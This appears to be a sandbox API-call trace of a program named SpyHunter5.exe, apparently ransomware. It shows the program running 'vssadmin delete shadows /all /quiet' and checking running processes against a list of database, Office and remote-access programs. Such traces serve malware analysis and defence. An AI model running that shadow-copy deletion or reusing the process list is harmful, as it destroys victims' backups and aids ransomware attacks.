dwFlags=0x0, lpMem=0x2636980 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26355d8 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2633c20 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636b80 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636bc0 | out: hHeap=0x2620000) returned 1 [0084.070] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636bd0 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26330a0 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2633d48 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636cb8 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636c90 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636d28 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26355f0 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2633e70 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26361b0 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632088 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636208 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26361a0 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2633f98 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637020 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26370c0 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26362e0 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637100 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635608 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26340c0 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637260 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637340 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637388 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636310 | out: hHeap=0x2620000) returned 1 [0084.071] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26341e8 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637568 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26376f0 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2637738 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636320 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2634310 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625850 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622288 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26222c0 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631fe8 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624a60 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632028 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631f88 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622dd8 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631fa8 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631f68 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2626d28 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631f08 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625830 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631a20 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26320e8 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623f08 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26250e0 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632048 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622da8 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26320c8 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623470 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631f28 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26320a8 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2624238 | out: hHeap=0x2620000) returned 1 [0084.072] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631f48 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632008 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632108 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2625e68 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2623898 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2631fc8 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26242b0 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26236a8 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632068 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622700 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636f28 | out: hHeap=0x2620000) returned 1 [0084.073] HeapFree (in: hHeap=0x2780000, dwFlags=0x0, lpMem=0x27807d0 | out: hHeap=0x2780000) returned 1 [0084.073] SetEvent (hEvent=0x7c) returned 1 [0084.073] GetCursorPos (in: lpPoint=0x18fe90 | out: lpPoint=0x18fe90*(x=1403, y=220)) returned 1 [0084.073] GetCapture () returned 0x0 [0084.073] WindowFromPoint (Point=0x57b) returned 0x100f8 [0084.073] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x460 [0084.073] Sleep (dwMilliseconds=0x0) [0084.254] ReleaseMutex (hMutex=0x80) returned 1 [0084.254] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0084.254] ResetEvent (hEvent=0x7c) returned 1 [0084.254] ReleaseMutex (hMutex=0x80) returned 1 [0084.254] SetEvent (hEvent=0x7c) returned 1 [0084.254] DestroyWindow (hWnd=0x4011e) returned 0 [0084.254] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26221e8 | out: hHeap=0x2620000) returned 1 [0084.254] DeleteDC (hdc=0x2601025c) returned 1 [0084.255] IMalloc:Free (This=0x757266bc, pv=0x57cc08) [0084.255] IMalloc:Free (This=0x757266bc, pv=0x579668) [0084.255] IMalloc:Free (This=0x757266bc, pv=0x579da0) [0084.255] IMalloc:Free (This=0x757266bc, pv=0x57d580) [0084.255] IMalloc:Free (This=0x757266bc, pv=0x579690) [0084.255] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x18fec0 | out: lplpMessageFilter=0x18fec0*=0x2622054) returned 0x0 [0084.255] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622050 | out: hHeap=0x2620000) returned 1 [0084.255] UnhookWindowsHookEx (hhk=0x401a9) returned 1 [0084.255] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26221d0 | out: hHeap=0x2620000) returned 1 [0084.255] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26221b0 | out: hHeap=0x2620000) returned 1 [0084.255] GetTickCount () returned 0x1ec03 [0084.255] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622120 | out: hHeap=0x2620000) returned 1 [0084.255] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622170 | out: hHeap=0x2620000) returned 1 [0084.255] SetWindowLongA (hWnd=0x40124, nIndex=0, dwNewLong=0) returned 39985308 [0084.255] DestroyWindow (hWnd=0x40124) returned 1 [0084.255] NtdllDefWindowProc_A (hWnd=0x40124, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0084.256] NtdllDefWindowProc_A (hWnd=0x40124, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0084.257] NtdllDefWindowProc_A (hWnd=0x40124, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0084.257] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622098 | out: hHeap=0x2620000) returned 1 [0084.257] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622078 | out: hHeap=0x2620000) returned 1 [0084.257] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622138 | out: hHeap=0x2620000) returned 1 [0084.257] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0084.257] ResetEvent (hEvent=0x7c) returned 1 [0084.257] ReleaseMutex (hMutex=0x80) returned 1 [0084.257] SetEvent (hEvent=0x7c) returned 1 [0084.257] HeapDestroy (hHeap=0x2780000) returned 1 [0084.258] GlobalDeleteAtom (nAtom=0xc164) returned 0x0 [0084.258] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26217e0 | out: hHeap=0x2620000) returned 1 [0084.258] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26217b0 | out: hHeap=0x2620000) returned 1 [0084.258] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2636e30 | out: hHeap=0x2620000) returned 1 [0084.258] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2622b40 | out: hHeap=0x2620000) returned 1 [0084.258] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2621810 | out: hHeap=0x2620000) returned 1 [0084.258] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2621bc0 | out: hHeap=0x2620000) returned 1 [0084.258] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2621f70 | out: hHeap=0x2620000) returned 1 [0084.258] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26382a0 | out: hHeap=0x2620000) returned 1 [0084.258] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.259] IMalloc:Free (This=0x757266bc, pv=0x578e90) [0084.259] IUnknown:AddRef (This=0x757266bc) returned 0x1 [0084.259] Sleep (dwMilliseconds=0x0) [0084.417] CoFreeUnusedLibraries () [0084.417] OleUninitialize () [0084.738] FreeLibrary (hLibModule=0x75220000) returned 1 [0084.738] ReleaseSemaphore (in: hSemaphore=0x90, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0084.738] GetCurrentThreadId () returned 0xa48 [0084.738] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26208e0 | out: hHeap=0x2620000) returned 1 [0084.739] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x26207d0 | out: hHeap=0x2620000) returned 1 [0084.739] ExitProcess (uExitCode=0x0) [0084.895] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0084.895] ResetEvent (hEvent=0x7c) returned 1 [0084.895] ReleaseMutex (hMutex=0x80) returned 1 [0084.895] SetEvent (hEvent=0x7c) returned 1 [0084.895] GetCurrentThreadId () returned 0xa48 [0084.895] GetCurrentThreadId () returned 0xa48 [0084.895] IUnknown:AddRef (This=0x757266bc) returned 0x1 [0084.895] HeapDestroy (hHeap=0x2620000) returned 1 [0084.896] CloseHandle (hObject=0x7c) returned 1 [0084.896] CloseHandle (hObject=0x80) returned 1 [0084.897] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x220d48 | out: hHeap=0x220000) returned 1 [0084.897] VirtualFree (lpAddress=0x1d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.897] HeapDestroy (hHeap=0x220000) returned 1 Thread: id = 3 os_tid = 0xaa4 [0075.553] GetCurrentThreadId () returned 0xaa4 [0083.892] GetCurrentThreadId () returned 0xaa4 Thread: id = 15 os_tid = 0xae4 [0081.159] GetCurrentThreadId () returned 0xae4 Thread: id = 16 os_tid = 0xaf0 [0081.390] GetCurrentThreadId () returned 0xaf0 Thread: id = 17 os_tid = 0xaf4 Process: id = "2" image_name = "spyhunter5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\spyhunter5.exe" page_root = "0x431f5000" os_pid = "0xa9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0xaa0 [0075.531] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fa48 | out: TokenHandle=0x18fa48*=0x80) returned 1 [0075.531] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fa4c | out: TokenInformation=0x0, ReturnLength=0x18fa4c) returned 0 [0075.531] GetLastError () returned 0x7a [0075.531] GetProcessHeap () returned 0x2c0000 [0075.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x54) returned 0x2d46c8 [0075.531] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x19, TokenInformation=0x2d46c8, TokenInformationLength=0x14, ReturnLength=0x18fa4c | out: TokenInformation=0x2d46c8, ReturnLength=0x18fa4c) returned 1 [0075.531] GetSidSubAuthorityCount (pSid=0x2d46d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2d46d1 [0075.531] GetSidSubAuthority (pSid=0x2d46d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2d46d8 [0075.531] GetProcessHeap () returned 0x2c0000 [0075.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d46c8 | out: hHeap=0x2c0000) returned 1 [0075.531] CloseHandle (hObject=0x80) returned 1 [0075.532] GetUserDefaultLangID () returned 0x409 [0075.532] CreateProcessW (in: lpApplicationName="C:\\Windows\\sysnative\\vssadmin.exe", lpCommandLine=" delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f97c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f9c0 | out: lpCommandLine=" delete shadows /all /quiet", lpProcessInformation=0x18f9c0*(hProcess=0x84, hThread=0x80, dwProcessId=0xaa8, dwThreadId=0xaac)) returned 1 [0076.133] CloseHandle (hObject=0x80) returned 1 [0076.133] CloseHandle (hObject=0x84) returned 1 [0076.133] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x84 [0076.135] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.136] lstrcmpiW (lpString1="[System Process]", lpString2="sqlwriter.exe") returned -1 [0076.137] lstrlenW (lpString="sqlwriter.exe") returned 13 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="sqlbrowser.exe") returned -1 [0076.137] lstrlenW (lpString="sqlbrowser.exe") returned 14 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="sqlservr.exe") returned -1 [0076.137] lstrlenW (lpString="sqlservr.exe") returned 12 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="TNSLSNR.EXE") returned -1 [0076.137] lstrlenW (lpString="TNSLSNR.EXE") returned 11 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="mysqld.exe") returned -1 [0076.137] lstrlenW (lpString="mysqld.exe") returned 10 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="MsDtsSrvr.exe") returned -1 [0076.137] lstrlenW (lpString="MsDtsSrvr.exe") returned 13 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="sqlceip.exe") returned -1 [0076.137] lstrlenW (lpString="sqlceip.exe") returned 11 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="msmdsrv.exe") returned -1 [0076.137] lstrlenW (lpString="msmdsrv.exe") returned 11 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="mpdwsvc.exe") returned -1 [0076.137] lstrlenW (lpString="mpdwsvc.exe") returned 11 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="fdlauncher.exe") returned -1 [0076.137] lstrlenW (lpString="fdlauncher.exe") returned 14 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="Launchpad.exe") returned -1 [0076.137] lstrlenW (lpString="Launchpad.exe") returned 13 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0076.137] lstrlenW (lpString="chrome.exe") returned 10 [0076.137] lstrcmpiW (lpString1="[System Process]", lpString2="oracle.exe") returned -1 [0076.137] lstrlenW (lpString="oracle.exe") returned 10 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="devenv.exe") returned -1 [0076.138] lstrlenW (lpString="devenv.exe") returned 10 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="PerfWatson2.exe") returned -1 [0076.138] lstrlenW (lpString="PerfWatson2.exe") returned 15 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="ServiceHub.Host.Node.x86.exe") returned -1 [0076.138] lstrlenW (lpString="ServiceHub.Host.Node.x86.exe") returned 28 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="Node.exe") returned -1 [0076.138] lstrlenW (lpString="Node.exe") returned 8 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="Microsoft.VisualStudio.Web.Host.exe") returned -1 [0076.138] lstrlenW (lpString="Microsoft.VisualStudio.Web.Host.exe") returned 35 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="Lightshot.exe") returned -1 [0076.138] lstrlenW (lpString="Lightshot.exe") returned 13 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="netbeans64.exe") returned -1 [0076.138] lstrlenW (lpString="netbeans64.exe") returned 14 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="spnsrvnt.exe") returned -1 [0076.138] lstrlenW (lpString="spnsrvnt.exe") returned 12 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="sntlsrtsrvr.exe") returned -1 [0076.138] lstrlenW (lpString="sntlsrtsrvr.exe") returned 15 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="w3wp.exe") returned -1 [0076.138] lstrlenW (lpString="w3wp.exe") returned 8 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="TeamViewer_Service.exe") returned -1 [0076.138] lstrlenW (lpString="TeamViewer_Service.exe") returned 22 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="TeamViewer.exe") returned -1 [0076.138] lstrlenW (lpString="TeamViewer.exe") returned 14 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="SecomSDK.exe") returned -1 [0076.138] lstrlenW (lpString="SecomSDK.exe") returned 12 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="schedul2.exe") returned -1 [0076.138] lstrlenW (lpString="schedul2.exe") returned 12 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="schedhlp.exe") returned -1 [0076.138] lstrlenW (lpString="schedhlp.exe") returned 12 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="adm_tray.exe") returned -1 [0076.138] lstrlenW (lpString="adm_tray.exe") returned 12 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="EXCEL.EXE") returned -1 [0076.138] lstrlenW (lpString="EXCEL.EXE") returned 9 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="MSACCESS.EXE") returned -1 [0076.138] lstrlenW (lpString="MSACCESS.EXE") returned 12 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="OUTLOOK.EXE") returned -1 [0076.138] lstrlenW (lpString="OUTLOOK.EXE") returned 11 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="POWERPNT.EXE") returned -1 [0076.138] lstrlenW (lpString="POWERPNT.EXE") returned 12 [0076.138] lstrcmpiW (lpString1="[System Process]", lpString2="AnyDesk.exe") returned -1 [0076.139] lstrlenW (lpString="AnyDesk.exe") returned 11 [0076.139] lstrcmpiW (lpString1="[System Process]", lpString2="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned -1 [0076.139] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe") returned 61 [0076.139] lstrcmpiW (lpString1="[System Process]", lpString2="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0076.139] lstrlenW (lpString="Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 66 [0076.139] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0076.139] lstrcmpiW (lpString1="System", lpString2="sqlwriter.exe") returned 1 [0076.139] lstrlenW (lpString="sqlwriter.exe") returned 13 [0076.139] lstrcmpiW (lpString1="System", lpString2="sqlbrowser.exe") returned 1 [0076.139] lstrlenW (lpString="sqlbrowser.exe") returned 14 [0076.139] lstrcmpiW (lpString1="System", lpString2="sqlservr.exe") returned 1 [0076.139] lstrlenW (lpString="sqlservr.exe") returned 12 [0076.139] lstrcmpiW (lpString1="System", lpString2="TNSLSNR.EXE") returned -1 [0076.139] lstrlenW (lpString="TNSLSNR.EXE") returned 11 [0076.139] lstrcmpiW (lpString1="System", lpString2="mysqld.exe") returned 1 [0076.139] lstrlenW (lpString="mysqld.exe") returned 10 [0076.139] lstrcmpiW (lpString1="System", lpString2="MsDtsSrvr.exe") returned 1 [0076.139] lstrlenW (lpString="MsDtsSrvr.exe") returned 13 [0076.139] lstrcmpiW (lpString1="System", lpString2="sqlceip.exe") returned 1 [0076.139] lstrlenW (lpString="sqlceip.exe") returned 11 [0076.139] lstrcmpiW (lpString1="System", lpString2="msmdsrv.exe") returned 1 [0076.139] lstrlenW (lpString="msmdsrv.exe") returned 11 [0076.139] lstrcmpiW (lpString1="System", lpString2="mpdwsvc.exe") returned 1 [0076.140] lstrlenW (lpString="mpdwsvc.exe") returned 11 [0076.140] lstrcmpiW (lpString1="System", lpString2="fdlauncher.exe") returned 1 [0076.140] lstrlenW (lpString="fdlauncher.exe") returned 14 [0076.140] lstrcmpiW (lpString1="System", lpString2="Launchpad.exe") returned 1 [0076.140] lstrlenW (lpString="Launchpad.exe") returned 13 [0076.140] lstrcmpiW (lpString1="System", lpString2="chrome.exe") returned 1 [0076.140] lstrlenW (lpString="chrome.exe") returned 10 [0076.140] lstrcmpiW (lpString1="System", lpString2="oracle.exe") returned 1 [0076.140] lstrlenW (lpString="oracle.exe") returned 10 [0076.140] lstrcmpiW (lpString1="System", lpString2="devenv.exe") returned 1 [0076.140] lstrlenW (lpString="devenv.exe") returned 10 [0076.140] lstrcmpiW (lpString1="System", lpString2="PerfWatson2.exe") returned 1 [0076.140] lstrlenW (lpString="PerfWatson2.exe") returned 15 [0076.140] lstrcmpiW (lpString1="System", lpString2="ServiceHub.Host.Node.x86.exe") returned 1 [0076.140] lstrlenW (lpString="ServiceHub.Host.Node.x86.exe") returned 28 [0076.140] lstrcmpiW (lpString1="System", lpString2="Node.exe") returned 1 [0076.140] lstrlenW (lpString="Node.exe") returned 8 [0076.140] lstrcmpiW (lpString1="System", lpString2="Microsoft.VisualStudio.Web.Host.exe") returned 1 [0076.140] lstrlenW (lpString="Microsoft.VisualStudio.Web.Host.exe") returned 35 [0076.140] lstrcmpiW (lpString1="System", lpString2="Lightshot.exe") returned 1 [0076.140] lstrlenW (lpString="Lightshot.exe") returned 13 [0076.140] lstrcmpiW (lpString1="System", lpString2="netbeans64.exe") returned 1 [0076.140] lstrlenW (lpString="netbeans64.exe") returned 14 [0076.140] lstrcmpiW (lpString1="System", lpString2="spnsrvnt.exe") returned 1 [0076.140] lstrlenW (lpString="spnsrvnt.exe") returned 12 [0076.140] lstrcmpiW (lpString1="System", lpString2="sntlsrtsrvr.exe") returned 1 [0076.140] lstrlenW (lpString="sntlsrtsrvr.exe") returned 15 [0076.140] lstrcmpiW (lpString1="System", lpString2="w3wp.exe") returned -1 [0076.140] 